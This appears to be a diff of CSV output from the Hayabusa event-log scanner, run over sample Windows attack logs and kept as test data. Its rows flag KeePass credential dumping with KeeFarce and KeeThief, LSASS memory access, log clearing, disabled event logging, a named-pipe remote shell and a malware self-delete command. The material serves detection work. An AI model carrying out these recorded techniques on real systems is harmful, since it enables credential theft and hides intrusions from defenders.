+2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 3188 | PGUID: 365ABB72-7C02-5CC4-0000-0010FD6E0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:54.165 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: KeeFarce.exe | Process: C:\Users\Public\KeeFarce.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xffa8 | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2364 | PGUID: 365ABB72-A201-5CC4-0000-00104F500800 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:47:00.062 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\Public\KeeFarce.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 1288 | Src PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Users\Public\KeeFarce.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:47:00.124 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\Public\KeeFarce.exe | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:55:04.710 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.980 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx
+2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,Evas,System Log File Cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
+2019-04-28 06:04:32.373 +09:00,DESKTOP-JR78RLP,7040,medium,Evas,Event Log Service Startup Type Changed To Disabled,Old Setting: auto start | New Setting: disabled,rules/hayabusa/default/alerts/System/7040_ImpairDefenses-DisableWindowsEventLogging_EventLogServiceStartupDisabled.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
+2019-04-29 01:29:42.988 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x800 | Src PID: 860 | Src PGUID: 365ABB72-D3C2-5CC5-0000-0010D9790500 | Tgt PID: 748 | Tgt PGUID: 365ABB72-D3E8-5CC5-0000-0010E7D30500,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
+2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
+2019-04-30 05:59:14.447 +09:00,IEWIN7,18,info,,Pipe Connected,\46a676ab7f179e511e30dd2dc41bd388 | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Evas | PrivEsc,Malicious Named Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:15.575 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.17:63025 (NLLT106876) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:21.539 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3940 | Src PGUID: 365ABB72-6231-5CC7-0000-00104CF71800 | Tgt PID: 3376 | Tgt PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:21.539 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x10896 | PID: 3376 | PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,10,low,,Process Access,Src Process: io\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3376 | Src PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400 | Tgt PID: 2116 | Tgt PGUID: 365ABB72-65AA-5CC7-0000-00104D882400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | LID: 0x10896 | PID: 2116 | PGUID: 365ABB72-65AA-5CC7-0000-00104D882400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:55.472 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x10896 | PID: 2244 | PGUID: 365ABB72-65CB-5CC7-0000-001002202600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 16:22:56.571 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Temp\opera autoupdate\installer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 2784 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010CB280E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:22:56.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:22:57.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3624 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.883 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-F69F-5CC7-0000-0010132B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001033480000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A74B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00103F4C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001043520000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001004550000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001072590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 500 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A3590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 616 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010BB700000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxService.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 676 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010E7AC0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 740 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00101AB00000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 804 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00105FB40000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 872 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001015C00000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 908 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010A7C40000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
